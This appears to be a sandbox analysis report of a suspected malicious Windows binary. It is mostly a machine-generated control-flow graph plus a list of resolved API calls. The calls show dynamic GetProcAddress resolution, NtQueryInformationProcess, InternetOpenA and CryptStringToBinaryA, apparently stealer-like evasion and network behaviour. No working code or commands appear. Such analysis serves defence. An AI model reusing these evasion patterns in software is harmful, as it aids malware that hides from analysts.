13948->13949 13950 94a8a0 lstrcpy 13949->13950 13951 946455 13950->13951 13952 94a8a0 lstrcpy 13951->13952 13953 946467 13952->13953 13954 94a8a0 lstrcpy 13953->13954 13955 945b86 13954->13955 13955->13719 13957 9345c0 2 API calls 13956->13957 13958 9326b4 13957->13958 13959 9345c0 2 API calls 13958->13959 13960 9326d7 13959->13960 13961 9345c0 2 API calls 13960->13961 13962 9326f0 13961->13962 13963 9345c0 2 API calls 13962->13963 13964 932709 13963->13964 13965 9345c0 2 API calls 13964->13965 13966 932736 13965->13966 13967 9345c0 2 API calls 13966->13967 13968 93274f 13967->13968 13969 9345c0 2 API calls 13968->13969 13970 932768 13969->13970 13971 9345c0 2 API calls 13970->13971 13972 932795 13971->13972 13973 9345c0 2 API calls 13972->13973 13974 9327ae 13973->13974 13975 9345c0 2 API calls 13974->13975 13976 9327c7 13975->13976 13977 9345c0 2 API calls 13976->13977 13978 9327e0 13977->13978 13979 9345c0 2 API calls 13978->13979 13980 9327f9 13979->13980 13981 9345c0 2 API calls 13980->13981 13982 932812 13981->13982 13983 9345c0 2 API calls 13982->13983 13984 93282b 13983->13984 13985 9345c0 2 API calls 13984->13985 13986 932844 13985->13986 13987 9345c0 2 API calls 13986->13987 13988 93285d 13987->13988 13989 9345c0 2 API calls 13988->13989 13990 932876 13989->13990 13991 9345c0 2 API calls 13990->13991 13992 93288f 13991->13992 13993 9345c0 2 API calls 13992->13993 13994 9328a8 13993->13994 13995 9345c0 2 API calls 13994->13995 13996 9328c1 13995->13996 13997 9345c0 2 API calls 13996->13997 13998 9328da 13997->13998 13999 9345c0 2 API calls 13998->13999 14000 9328f3 13999->14000 14001 9345c0 2 API calls 14000->14001 14002 93290c 14001->14002 14003 9345c0 2 API calls 14002->14003 14004 932925 14003->14004 14005 9345c0 2 API calls 14004->14005 14006 93293e 14005->14006 14007 9345c0 2 API calls 14006->14007 14008 932957 14007->14008 14009 9345c0 2 API calls 14008->14009 14010 932970 14009->14010 14011 9345c0 2 API calls 14010->14011 14012 932989 14011->14012 
14013 9345c0 2 API calls 14012->14013 14014 9329a2 14013->14014 14015 9345c0 2 API calls 14014->14015 14016 9329bb 14015->14016 14017 9345c0 2 API calls 14016->14017 14018 9329d4 14017->14018 14019 9345c0 2 API calls 14018->14019 14020 9329ed 14019->14020 14021 9345c0 2 API calls 14020->14021 14022 932a06 14021->14022 14023 9345c0 2 API calls 14022->14023 14024 932a1f 14023->14024 14025 9345c0 2 API calls 14024->14025 14026 932a38 14025->14026 14027 9345c0 2 API calls 14026->14027 14028 932a51 14027->14028 14029 9345c0 2 API calls 14028->14029 14030 932a6a 14029->14030 14031 9345c0 2 API calls 14030->14031 14032 932a83 14031->14032 14033 9345c0 2 API calls 14032->14033 14034 932a9c 14033->14034 14035 9345c0 2 API calls 14034->14035 14036 932ab5 14035->14036 14037 9345c0 2 API calls 14036->14037 14038 932ace 14037->14038 14039 9345c0 2 API calls 14038->14039 14040 932ae7 14039->14040 14041 9345c0 2 API calls 14040->14041 14042 932b00 14041->14042 14043 9345c0 2 API calls 14042->14043 14044 932b19 14043->14044 14045 9345c0 2 API calls 14044->14045 14046 932b32 14045->14046 14047 9345c0 2 API calls 14046->14047 14048 932b4b 14047->14048 14049 9345c0 2 API calls 14048->14049 14050 932b64 14049->14050 14051 9345c0 2 API calls 14050->14051 14052 932b7d 14051->14052 14053 9345c0 2 API calls 14052->14053 14054 932b96 14053->14054 14055 9345c0 2 API calls 14054->14055 14056 932baf 14055->14056 14057 9345c0 2 API calls 14056->14057 14058 932bc8 14057->14058 14059 9345c0 2 API calls 14058->14059 14060 932be1 14059->14060 14061 9345c0 2 API calls 14060->14061 14062 932bfa 14061->14062 14063 9345c0 2 API calls 14062->14063 14064 932c13 14063->14064 14065 9345c0 2 API calls 14064->14065 14066 932c2c 14065->14066 14067 9345c0 2 API calls 14066->14067 14068 932c45 14067->14068 14069 9345c0 2 API calls 14068->14069 14070 932c5e 14069->14070 14071 9345c0 2 API calls 14070->14071 14072 932c77 14071->14072 14073 9345c0 2 API calls 14072->14073 14074 932c90 14073->14074 14075 9345c0 2 
API calls 14074->14075 14076 932ca9 14075->14076 14077 9345c0 2 API calls 14076->14077 14078 932cc2 14077->14078 14079 9345c0 2 API calls 14078->14079 14080 932cdb 14079->14080 14081 9345c0 2 API calls 14080->14081 14082 932cf4 14081->14082 14083 9345c0 2 API calls 14082->14083 14084 932d0d 14083->14084 14085 9345c0 2 API calls 14084->14085 14086 932d26 14085->14086 14087 9345c0 2 API calls 14086->14087 14088 932d3f 14087->14088 14089 9345c0 2 API calls 14088->14089 14090 932d58 14089->14090 14091 9345c0 2 API calls 14090->14091 14092 932d71 14091->14092 14093 9345c0 2 API calls 14092->14093 14094 932d8a 14093->14094 14095 9345c0 2 API calls 14094->14095 14096 932da3 14095->14096 14097 9345c0 2 API calls 14096->14097 14098 932dbc 14097->14098 14099 9345c0 2 API calls 14098->14099 14100 932dd5 14099->14100 14101 9345c0 2 API calls 14100->14101 14102 932dee 14101->14102 14103 9345c0 2 API calls 14102->14103 14104 932e07 14103->14104 14105 9345c0 2 API calls 14104->14105 14106 932e20 14105->14106 14107 9345c0 2 API calls 14106->14107 14108 932e39 14107->14108 14109 9345c0 2 API calls 14108->14109 14110 932e52 14109->14110 14111 9345c0 2 API calls 14110->14111 14112 932e6b 14111->14112 14113 9345c0 2 API calls 14112->14113 14114 932e84 14113->14114 14115 9345c0 2 API calls 14114->14115 14116 932e9d 14115->14116 14117 9345c0 2 API calls 14116->14117 14118 932eb6 14117->14118 14119 9345c0 2 API calls 14118->14119 14120 932ecf 14119->14120 14121 9345c0 2 API calls 14120->14121 14122 932ee8 14121->14122 14123 9345c0 2 API calls 14122->14123 14124 932f01 14123->14124 14125 9345c0 2 API calls 14124->14125 14126 932f1a 14125->14126 14127 9345c0 2 API calls 14126->14127 14128 932f33 14127->14128 14129 9345c0 2 API calls 14128->14129 14130 932f4c 14129->14130 14131 9345c0 2 API calls 14130->14131 14132 932f65 14131->14132 14133 9345c0 2 API calls 14132->14133 14134 932f7e 14133->14134 14135 9345c0 2 API calls 14134->14135 14136 932f97 14135->14136 14137 9345c0 2 API calls 
14136->14137 14138 932fb0 14137->14138 14139 9345c0 2 API calls 14138->14139 14140 932fc9 14139->14140 14141 9345c0 2 API calls 14140->14141 14142 932fe2 14141->14142 14143 9345c0 2 API calls 14142->14143 14144 932ffb 14143->14144 14145 9345c0 2 API calls 14144->14145 14146 933014 14145->14146 14147 9345c0 2 API calls 14146->14147 14148 93302d 14147->14148 14149 9345c0 2 API calls 14148->14149 14150 933046 14149->14150 14151 9345c0 2 API calls 14150->14151 14152 93305f 14151->14152 14153 9345c0 2 API calls 14152->14153 14154 933078 14153->14154 14155 9345c0 2 API calls 14154->14155 14156 933091 14155->14156 14157 9345c0 2 API calls 14156->14157 14158 9330aa 14157->14158 14159 9345c0 2 API calls 14158->14159 14160 9330c3 14159->14160 14161 9345c0 2 API calls 14160->14161 14162 9330dc 14161->14162 14163 9345c0 2 API calls 14162->14163 14164 9330f5 14163->14164 14165 9345c0 2 API calls 14164->14165 14166 93310e 14165->14166 14167 9345c0 2 API calls 14166->14167 14168 933127 14167->14168 14169 9345c0 2 API calls 14168->14169 14170 933140 14169->14170 14171 9345c0 2 API calls 14170->14171 14172 933159 14171->14172 14173 9345c0 2 API calls 14172->14173 14174 933172 14173->14174 14175 9345c0 2 API calls 14174->14175 14176 93318b 14175->14176 14177 9345c0 2 API calls 14176->14177 14178 9331a4 14177->14178 14179 9345c0 2 API calls 14178->14179 14180 9331bd 14179->14180 14181 9345c0 2 API calls 14180->14181 14182 9331d6 14181->14182 14183 9345c0 2 API calls 14182->14183 14184 9331ef 14183->14184 14185 9345c0 2 API calls 14184->14185 14186 933208 14185->14186 14187 9345c0 2 API calls 14186->14187 14188 933221 14187->14188 14189 9345c0 2 API calls 14188->14189 14190 93323a 14189->14190 14191 9345c0 2 API calls 14190->14191 14192 933253 14191->14192 14193 9345c0 2 API calls 14192->14193 14194 93326c 14193->14194 14195 9345c0 2 API calls 14194->14195 14196 933285 14195->14196 14197 9345c0 2 API calls 14196->14197 14198 93329e 14197->14198 14199 9345c0 2 API calls 14198->14199 
14200 9332b7 14199->14200 14201 9345c0 2 API calls 14200->14201 14202 9332d0 14201->14202 14203 9345c0 2 API calls 14202->14203 14204 9332e9 14203->14204 14205 9345c0 2 API calls 14204->14205 14206 933302 14205->14206 14207 9345c0 2 API calls 14206->14207 14208 93331b 14207->14208 14209 9345c0 2 API calls 14208->14209 14210 933334 14209->14210 14211 9345c0 2 API calls 14210->14211 14212 93334d 14211->14212 14213 9345c0 2 API calls 14212->14213 14214 933366 14213->14214 14215 9345c0 2 API calls 14214->14215 14216 93337f 14215->14216 14217 9345c0 2 API calls 14216->14217 14218 933398 14217->14218 14219 9345c0 2 API calls 14218->14219 14220 9333b1 14219->14220 14221 9345c0 2 API calls 14220->14221 14222 9333ca 14221->14222 14223 9345c0 2 API calls 14222->14223 14224 9333e3 14223->14224 14225 9345c0 2 API calls 14224->14225 14226 9333fc 14225->14226 14227 9345c0 2 API calls 14226->14227 14228 933415 14227->14228 14229 9345c0 2 API calls 14228->14229 14230 93342e 14229->14230 14231 9345c0 2 API calls 14230->14231 14232 933447 14231->14232 14233 9345c0 2 API calls 14232->14233 14234 933460 14233->14234 14235 9345c0 2 API calls 14234->14235 14236 933479 14235->14236 14237 9345c0 2 API calls 14236->14237 14238 933492 14237->14238 14239 9345c0 2 API calls 14238->14239 14240 9334ab 14239->14240 14241 9345c0 2 API calls 14240->14241 14242 9334c4 14241->14242 14243 9345c0 2 API calls 14242->14243 14244 9334dd 14243->14244 14245 9345c0 2 API calls 14244->14245 14246 9334f6 14245->14246 14247 9345c0 2 API calls 14246->14247 14248 93350f 14247->14248 14249 9345c0 2 API calls 14248->14249 14250 933528 14249->14250 14251 9345c0 2 API calls 14250->14251 14252 933541 14251->14252 14253 9345c0 2 API calls 14252->14253 14254 93355a 14253->14254 14255 9345c0 2 API calls 14254->14255 14256 933573 14255->14256 14257 9345c0 2 API calls 14256->14257 14258 93358c 14257->14258 14259 9345c0 2 API calls 14258->14259 14260 9335a5 14259->14260 14261 9345c0 2 API calls 14260->14261 14262 9335be 
14261->14262 14263 9345c0 2 API calls 14262->14263 14264 9335d7 14263->14264 14265 9345c0 2 API calls 14264->14265 14266 9335f0 14265->14266 14267 9345c0 2 API calls 14266->14267 14268 933609 14267->14268 14269 9345c0 2 API calls 14268->14269 14270 933622 14269->14270 14271 9345c0 2 API calls 14270->14271 14272 93363b 14271->14272 14273 9345c0 2 API calls 14272->14273 14274 933654 14273->14274 14275 9345c0 2 API calls 14274->14275 14276 93366d 14275->14276 14277 9345c0 2 API calls 14276->14277 14278 933686 14277->14278 14279 9345c0 2 API calls 14278->14279 14280 93369f 14279->14280 14281 9345c0 2 API calls 14280->14281 14282 9336b8 14281->14282 14283 9345c0 2 API calls 14282->14283 14284 9336d1 14283->14284 14285 9345c0 2 API calls 14284->14285 14286 9336ea 14285->14286 14287 9345c0 2 API calls 14286->14287 14288 933703 14287->14288 14289 9345c0 2 API calls 14288->14289 14290 93371c 14289->14290 14291 9345c0 2 API calls 14290->14291 14292 933735 14291->14292 14293 9345c0 2 API calls 14292->14293 14294 93374e 14293->14294 14295 9345c0 2 API calls 14294->14295 14296 933767 14295->14296 14297 9345c0 2 API calls 14296->14297 14298 933780 14297->14298 14299 9345c0 2 API calls 14298->14299 14300 933799 14299->14300 14301 9345c0 2 API calls 14300->14301 14302 9337b2 14301->14302 14303 9345c0 2 API calls 14302->14303 14304 9337cb 14303->14304 14305 9345c0 2 API calls 14304->14305 14306 9337e4 14305->14306 14307 9345c0 2 API calls 14306->14307 14308 9337fd 14307->14308 14309 9345c0 2 API calls 14308->14309 14310 933816 14309->14310 14311 9345c0 2 API calls 14310->14311 14312 93382f 14311->14312 14313 9345c0 2 API calls 14312->14313 14314 933848 14313->14314 14315 9345c0 2 API calls 14314->14315 14316 933861 14315->14316 14317 9345c0 2 API calls 14316->14317 14318 93387a 14317->14318 14319 9345c0 2 API calls 14318->14319 14320 933893 14319->14320 14321 9345c0 2 API calls 14320->14321 14322 9338ac 14321->14322 14323 9345c0 2 API calls 14322->14323 14324 9338c5 14323->14324 
14325 9345c0 2 API calls 14324->14325 14326 9338de 14325->14326 14327 9345c0 2 API calls 14326->14327 14328 9338f7 14327->14328 14329 9345c0 2 API calls 14328->14329 14330 933910 14329->14330 14331 9345c0 2 API calls 14330->14331 14332 933929 14331->14332 14333 9345c0 2 API calls 14332->14333 14334 933942 14333->14334 14335 9345c0 2 API calls 14334->14335 14336 93395b 14335->14336 14337 9345c0 2 API calls 14336->14337 14338 933974 14337->14338 14339 9345c0 2 API calls 14338->14339 14340 93398d 14339->14340 14341 9345c0 2 API calls 14340->14341 14342 9339a6 14341->14342 14343 9345c0 2 API calls 14342->14343 14344 9339bf 14343->14344 14345 9345c0 2 API calls 14344->14345 14346 9339d8 14345->14346 14347 9345c0 2 API calls 14346->14347 14348 9339f1 14347->14348 14349 9345c0 2 API calls 14348->14349 14350 933a0a 14349->14350 14351 9345c0 2 API calls 14350->14351 14352 933a23 14351->14352 14353 9345c0 2 API calls 14352->14353 14354 933a3c 14353->14354 14355 9345c0 2 API calls 14354->14355 14356 933a55 14355->14356 14357 9345c0 2 API calls 14356->14357 14358 933a6e 14357->14358 14359 9345c0 2 API calls 14358->14359 14360 933a87 14359->14360 14361 9345c0 2 API calls 14360->14361 14362 933aa0 14361->14362 14363 9345c0 2 API calls 14362->14363 14364 933ab9 14363->14364 14365 9345c0 2 API calls 14364->14365 14366 933ad2 14365->14366 14367 9345c0 2 API calls 14366->14367 14368 933aeb 14367->14368 14369 9345c0 2 API calls 14368->14369 14370 933b04 14369->14370 14371 9345c0 2 API calls 14370->14371 14372 933b1d 14371->14372 14373 9345c0 2 API calls 14372->14373 14374 933b36 14373->14374 14375 9345c0 2 API calls 14374->14375 14376 933b4f 14375->14376 14377 9345c0 2 API calls 14376->14377 14378 933b68 14377->14378 14379 9345c0 2 API calls 14378->14379 14380 933b81 14379->14380 14381 9345c0 2 API calls 14380->14381 14382 933b9a 14381->14382 14383 9345c0 2 API calls 14382->14383 14384 933bb3 14383->14384 14385 9345c0 2 API calls 14384->14385 14386 933bcc 14385->14386 14387 9345c0 2 
API calls 14386->14387 14388 933be5 14387->14388 14389 9345c0 2 API calls 14388->14389 14390 933bfe 14389->14390 14391 9345c0 2 API calls 14390->14391 14392 933c17 14391->14392 14393 9345c0 2 API calls 14392->14393 14394 933c30 14393->14394 14395 9345c0 2 API calls 14394->14395 14396 933c49 14395->14396 14397 9345c0 2 API calls 14396->14397 14398 933c62 14397->14398 14399 9345c0 2 API calls 14398->14399 14400 933c7b 14399->14400 14401 9345c0 2 API calls 14400->14401 14402 933c94 14401->14402 14403 9345c0 2 API calls 14402->14403 14404 933cad 14403->14404 14405 9345c0 2 API calls 14404->14405 14406 933cc6 14405->14406 14407 9345c0 2 API calls 14406->14407 14408 933cdf 14407->14408 14409 9345c0 2 API calls 14408->14409 14410 933cf8 14409->14410 14411 9345c0 2 API calls 14410->14411 14412 933d11 14411->14412 14413 9345c0 2 API calls 14412->14413 14414 933d2a 14413->14414 14415 9345c0 2 API calls 14414->14415 14416 933d43 14415->14416 14417 9345c0 2 API calls 14416->14417 14418 933d5c 14417->14418 14419 9345c0 2 API calls 14418->14419 14420 933d75 14419->14420 14421 9345c0 2 API calls 14420->14421 14422 933d8e 14421->14422 14423 9345c0 2 API calls 14422->14423 14424 933da7 14423->14424 14425 9345c0 2 API calls 14424->14425 14426 933dc0 14425->14426 14427 9345c0 2 API calls 14426->14427 14428 933dd9 14427->14428 14429 9345c0 2 API calls 14428->14429 14430 933df2 14429->14430 14431 9345c0 2 API calls 14430->14431 14432 933e0b 14431->14432 14433 9345c0 2 API calls 14432->14433 14434 933e24 14433->14434 14435 9345c0 2 API calls 14434->14435 14436 933e3d 14435->14436 14437 9345c0 2 API calls 14436->14437 14438 933e56 14437->14438 14439 9345c0 2 API calls 14438->14439 14440 933e6f 14439->14440 14441 9345c0 2 API calls 14440->14441 14442 933e88 14441->14442 14443 9345c0 2 API calls 14442->14443 14444 933ea1 14443->14444 14445 9345c0 2 API calls 14444->14445 14446 933eba 14445->14446 14447 9345c0 2 API calls 14446->14447 14448 933ed3 14447->14448 14449 9345c0 2 API calls 
14448->14449 14450 933eec 14449->14450 14451 9345c0 2 API calls 14450->14451 14452 933f05 14451->14452 14453 9345c0 2 API calls 14452->14453 14454 933f1e 14453->14454 14455 9345c0 2 API calls 14454->14455 14456 933f37 14455->14456 14457 9345c0 2 API calls 14456->14457 14458 933f50 14457->14458 14459 9345c0 2 API calls 14458->14459 14460 933f69 14459->14460 14461 9345c0 2 API calls 14460->14461 14462 933f82 14461->14462 14463 9345c0 2 API calls 14462->14463 14464 933f9b 14463->14464 14465 9345c0 2 API calls 14464->14465 14466 933fb4 14465->14466 14467 9345c0 2 API calls 14466->14467 14468 933fcd 14467->14468 14469 9345c0 2 API calls 14468->14469 14470 933fe6 14469->14470 14471 9345c0 2 API calls 14470->14471 14472 933fff 14471->14472 14473 9345c0 2 API calls 14472->14473 14474 934018 14473->14474 14475 9345c0 2 API calls 14474->14475 14476 934031 14475->14476 14477 9345c0 2 API calls 14476->14477 14478 93404a 14477->14478 14479 9345c0 2 API calls 14478->14479 14480 934063 14479->14480 14481 9345c0 2 API calls 14480->14481 14482 93407c 14481->14482 14483 9345c0 2 API calls 14482->14483 14484 934095 14483->14484 14485 9345c0 2 API calls 14484->14485 14486 9340ae 14485->14486 14487 9345c0 2 API calls 14486->14487 14488 9340c7 14487->14488 14489 9345c0 2 API calls 14488->14489 14490 9340e0 14489->14490 14491 9345c0 2 API calls 14490->14491 14492 9340f9 14491->14492 14493 9345c0 2 API calls 14492->14493 14494 934112 14493->14494 14495 9345c0 2 API calls 14494->14495 14496 93412b 14495->14496 14497 9345c0 2 API calls 14496->14497 14498 934144 14497->14498 14499 9345c0 2 API calls 14498->14499 14500 93415d 14499->14500 14501 9345c0 2 API calls 14500->14501 14502 934176 14501->14502 14503 9345c0 2 API calls 14502->14503 14504 93418f 14503->14504 14505 9345c0 2 API calls 14504->14505 14506 9341a8 14505->14506 14507 9345c0 2 API calls 14506->14507 14508 9341c1 14507->14508 14509 9345c0 2 API calls 14508->14509 14510 9341da 14509->14510 14511 9345c0 2 API calls 14510->14511 
14512 9341f3 14511->14512 14513 9345c0 2 API calls 14512->14513 14514 93420c 14513->14514 14515 9345c0 2 API calls 14514->14515 14516 934225 14515->14516 14517 9345c0 2 API calls 14516->14517 14518 93423e 14517->14518 14519 9345c0 2 API calls 14518->14519 14520 934257 14519->14520 14521 9345c0 2 API calls 14520->14521 14522 934270 14521->14522 14523 9345c0 2 API calls 14522->14523 14524 934289 14523->14524 14525 9345c0 2 API calls 14524->14525 14526 9342a2 14525->14526 14527 9345c0 2 API calls 14526->14527 14528 9342bb 14527->14528 14529 9345c0 2 API calls 14528->14529 14530 9342d4 14529->14530 14531 9345c0 2 API calls 14530->14531 14532 9342ed 14531->14532 14533 9345c0 2 API calls 14532->14533 14534 934306 14533->14534 14535 9345c0 2 API calls 14534->14535 14536 93431f 14535->14536 14537 9345c0 2 API calls 14536->14537 14538 934338 14537->14538 14539 9345c0 2 API calls 14538->14539 14540 934351 14539->14540 14541 9345c0 2 API calls 14540->14541 14542 93436a 14541->14542 14543 9345c0 2 API calls 14542->14543 14544 934383 14543->14544 14545 9345c0 2 API calls 14544->14545 14546 93439c 14545->14546 14547 9345c0 2 API calls 14546->14547 14548 9343b5 14547->14548 14549 9345c0 2 API calls 14548->14549 14550 9343ce 14549->14550 14551 9345c0 2 API calls 14550->14551 14552 9343e7 14551->14552 14553 9345c0 2 API calls 14552->14553 14554 934400 14553->14554 14555 9345c0 2 API calls 14554->14555 14556 934419 14555->14556 14557 9345c0 2 API calls 14556->14557 14558 934432 14557->14558 14559 9345c0 2 API calls 14558->14559 14560 93444b 14559->14560 14561 9345c0 2 API calls 14560->14561 14562 934464 14561->14562 14563 9345c0 2 API calls 14562->14563 14564 93447d 14563->14564 14565 9345c0 2 API calls 14564->14565 14566 934496 14565->14566 14567 9345c0 2 API calls 14566->14567 14568 9344af 14567->14568 14569 9345c0 2 API calls 14568->14569 14570 9344c8 14569->14570 14571 9345c0 2 API calls 14570->14571 14572 9344e1 14571->14572 14573 9345c0 2 API calls 14572->14573 14574 9344fa 
14573->14574 14575 9345c0 2 API calls 14574->14575 14576 934513 14575->14576 14577 9345c0 2 API calls 14576->14577 14578 93452c 14577->14578 14579 9345c0 2 API calls 14578->14579 14580 934545 14579->14580 14581 9345c0 2 API calls 14580->14581 14582 93455e 14581->14582 14583 9345c0 2 API calls 14582->14583 14584 934577 14583->14584 14585 9345c0 2 API calls 14584->14585 14586 934590 14585->14586 14587 9345c0 2 API calls 14586->14587 14588 9345a9 14587->14588 14589 949c10 14588->14589 14590 94a036 8 API calls 14589->14590 14591 949c20 43 API calls 14589->14591 14592 94a146 14590->14592 14593 94a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14590->14593 14591->14590 14594 94a216 14592->14594 14595 94a153 8 API calls 14592->14595 14593->14592 14596 94a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14596 14597 94a298 14594->14597 14595->14594 14596->14597 14598 94a2a5 6 API calls 14597->14598 14599 94a337 14597->14599 14598->14599 14600 94a344 9 API calls 14599->14600 14601 94a41f 14599->14601 14600->14601 14602 94a4a2 14601->14602 14603 94a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14601->14603 14604 94a4dc 14602->14604 14605 94a4ab GetProcAddress GetProcAddress 14602->14605 14603->14602 14606 94a515 14604->14606 14607 94a4e5 GetProcAddress GetProcAddress 14604->14607 14605->14604 14608 94a612 14606->14608 14609 94a522 10 API calls 14606->14609 14607->14606 14610 94a67d 14608->14610 14611 94a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14608->14611 14609->14608 14612 94a686 GetProcAddress 14610->14612 14613 94a69e 14610->14613 14611->14610 14612->14613 14614 94a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14613->14614 14615 945ca3 14613->14615 14614->14615 14616 931590 14615->14616 15737 931670 14616->15737 14619 94a7a0 lstrcpy 14620 9315b5 14619->14620 14621 94a7a0 lstrcpy 14620->14621 14622 9315c7 14621->14622 14623 94a7a0 
lstrcpy 14622->14623 14624 9315d9 14623->14624 14625 94a7a0 lstrcpy 14624->14625 14626 931663 14625->14626 14627 945510 14626->14627 14628 945521 14627->14628 14629 94a820 2 API calls 14628->14629 14630 94552e 14629->14630 14631 94a820 2 API calls 14630->14631 14632 94553b 14631->14632 14633 94a820 2 API calls 14632->14633 14634 945548 14633->14634 14635 94a740 lstrcpy 14634->14635 14636 945555 14635->14636 14637 94a740 lstrcpy 14636->14637 14638 945562 14637->14638 14639 94a740 lstrcpy 14638->14639 14640 94556f 14639->14640 14641 94a740 lstrcpy 14640->14641 14651 94557c 14641->14651 14642 94a740 lstrcpy 14642->14651 14643 94a7a0 lstrcpy 14643->14651 14644 945643 StrCmpCA 14644->14651 14645 9456a0 StrCmpCA 14646 9457dc 14645->14646 14645->14651 14647 94a8a0 lstrcpy 14646->14647 14648 9457e8 14647->14648 14649 94a820 2 API calls 14648->14649 14652 9457f6 14649->14652 14650 945856 StrCmpCA 14650->14651 14653 945991 14650->14653 14651->14642 14651->14643 14651->14644 14651->14645 14651->14650 14658 931590 lstrcpy 14651->14658 14660 94a820 lstrlen lstrcpy 14651->14660 14662 945a0b StrCmpCA 14651->14662 14663 9452c0 25 API calls 14651->14663 14664 9451f0 20 API calls 14651->14664 14677 94a8a0 lstrcpy 14651->14677 14678 94578a StrCmpCA 14651->14678 14681 94593f StrCmpCA 14651->14681 14654 94a820 2 API calls 14652->14654 14656 94a8a0 lstrcpy 14653->14656 14655 945805 14654->14655 14657 931670 lstrcpy 14655->14657 14659 94599d 14656->14659 14680 945811 14657->14680 14658->14651 14661 94a820 2 API calls 14659->14661 14660->14651 14665 9459ab 14661->14665 14667 945a16 Sleep 14662->14667 14668 945a28 14662->14668 14663->14651 14664->14651 14666 94a820 2 API calls 14665->14666 14669 9459ba 14666->14669 14667->14651 14670 94a8a0 lstrcpy 14668->14670 14671 931670 lstrcpy 14669->14671 14672 945a34 14670->14672 14671->14680 14673 94a820 2 API calls 14672->14673 14674 945a43 14673->14674 14675 94a820 2 API calls 14674->14675 14676 945a52 14675->14676 14679 931670 lstrcpy 
14676->14679 14677->14651 14678->14651 14679->14680 14680->13734 14681->14651 14683 947553 GetVolumeInformationA 14682->14683 14684 94754c 14682->14684 14685 947591 14683->14685 14684->14683 14686 9475fc GetProcessHeap RtlAllocateHeap 14685->14686 14687 947628 wsprintfA 14686->14687 14688 947619 14686->14688 14690 94a740 lstrcpy 14687->14690 14689 94a740 lstrcpy 14688->14689 14691 945da7 14689->14691 14690->14691 14691->13755 14693 94a7a0 lstrcpy 14692->14693 14694 934899 14693->14694 15746 9347b0 14694->15746 14696 9348a5 14697 94a740 lstrcpy 14696->14697 14698 9348d7 14697->14698 14699 94a740 lstrcpy 14698->14699 14700 9348e4 14699->14700 14701 94a740 lstrcpy 14700->14701 14702 9348f1 14701->14702 14703 94a740 lstrcpy 14702->14703 14704 9348fe 14703->14704 14705 94a740 lstrcpy 14704->14705 14706 93490b InternetOpenA StrCmpCA 14705->14706 14707 934944 14706->14707 14708 934ecb InternetCloseHandle 14707->14708 15752 948b60 14707->15752 14710 934ee8 14708->14710 15767 939ac0 CryptStringToBinaryA 14710->15767 14711 934963 15760 94a920 14711->15760 14714 934976 14716 94a8a0 lstrcpy 14714->14716 14722 93497f 14716->14722 14717 94a820 2 API calls 14718 934f05 14717->14718 14719 94a9b0 4 API calls 14718->14719 14721 934f1b 14719->14721 14720 934f27 ctype 14724 94a7a0 lstrcpy 14720->14724 14723 94a8a0 lstrcpy 14721->14723 14725 94a9b0 4 API calls 14722->14725 14723->14720 14737 934f57 14724->14737 14726 9349a9 14725->14726 14727 94a8a0 lstrcpy 14726->14727 14728 9349b2 14727->14728 14729 94a9b0 4 API calls 14728->14729 14730 9349d1 14729->14730 14731 94a8a0 lstrcpy 14730->14731 14732 9349da 14731->14732 14733 94a920 3 API calls 14732->14733 14734 9349f8 14733->14734 14735 94a8a0 lstrcpy 14734->14735 14736 934a01 14735->14736 14738 94a9b0 4 API calls 14736->14738 14737->13758 14739 934a20 14738->14739 14740 94a8a0 lstrcpy 14739->14740 14741 934a29 14740->14741 14742 94a9b0 4 API calls 14741->14742 14743 934a48 14742->14743 14744 94a8a0 lstrcpy 14743->14744 14745 934a51 

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,015B2488), ref: 009498A1
                                • GetProcAddress.KERNEL32(74DD0000,015B2218), ref: 009498BA
                                • GetProcAddress.KERNEL32(74DD0000,015B2428), ref: 009498D2
                                • GetProcAddress.KERNEL32(74DD0000,015B2458), ref: 009498EA
                                • GetProcAddress.KERNEL32(74DD0000,015B22A8), ref: 00949903
                                • GetProcAddress.KERNEL32(74DD0000,015B9088), ref: 0094991B
                                • GetProcAddress.KERNEL32(74DD0000,015A5910), ref: 00949933
                                • GetProcAddress.KERNEL32(74DD0000,015A5810), ref: 0094994C
                                • GetProcAddress.KERNEL32(74DD0000,015B2470), ref: 00949964
                                • GetProcAddress.KERNEL32(74DD0000,015B2350), ref: 0094997C
                                • GetProcAddress.KERNEL32(74DD0000,015B2380), ref: 00949995
                                • GetProcAddress.KERNEL32(74DD0000,015B2338), ref: 009499AD
                                • GetProcAddress.KERNEL32(74DD0000,015A5790), ref: 009499C5
                                • GetProcAddress.KERNEL32(74DD0000,015B22F0), ref: 009499DE
                                • GetProcAddress.KERNEL32(74DD0000,015B2320), ref: 009499F6
                                • GetProcAddress.KERNEL32(74DD0000,015A5830), ref: 00949A0E
                                • GetProcAddress.KERNEL32(74DD0000,015B2368), ref: 00949A27
                                • GetProcAddress.KERNEL32(74DD0000,015B2398), ref: 00949A3F
                                • GetProcAddress.KERNEL32(74DD0000,015A59B0), ref: 00949A57
                                • GetProcAddress.KERNEL32(74DD0000,015B2410), ref: 00949A70
                                • GetProcAddress.KERNEL32(74DD0000,015A5930), ref: 00949A88
                                • LoadLibraryA.KERNEL32(015B2560,?,00946A00), ref: 00949A9A
                                • LoadLibraryA.KERNEL32(015B2590,?,00946A00), ref: 00949AAB
                                • LoadLibraryA.KERNEL32(015B2530,?,00946A00), ref: 00949ABD
                                • LoadLibraryA.KERNEL32(015B2548,?,00946A00), ref: 00949ACF
                                • LoadLibraryA.KERNEL32(015B2578,?,00946A00), ref: 00949AE0
                                • GetProcAddress.KERNEL32(75A70000,015B25A8), ref: 00949B02
                                • GetProcAddress.KERNEL32(75290000,015B25D8), ref: 00949B23
                                • GetProcAddress.KERNEL32(75290000,015B2518), ref: 00949B3B
                                • GetProcAddress.KERNEL32(75BD0000,015B25C0), ref: 00949B5D
                                • GetProcAddress.KERNEL32(75450000,015A5770), ref: 00949B7E
                                • GetProcAddress.KERNEL32(76E90000,015B90E8), ref: 00949B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00949BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00949BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
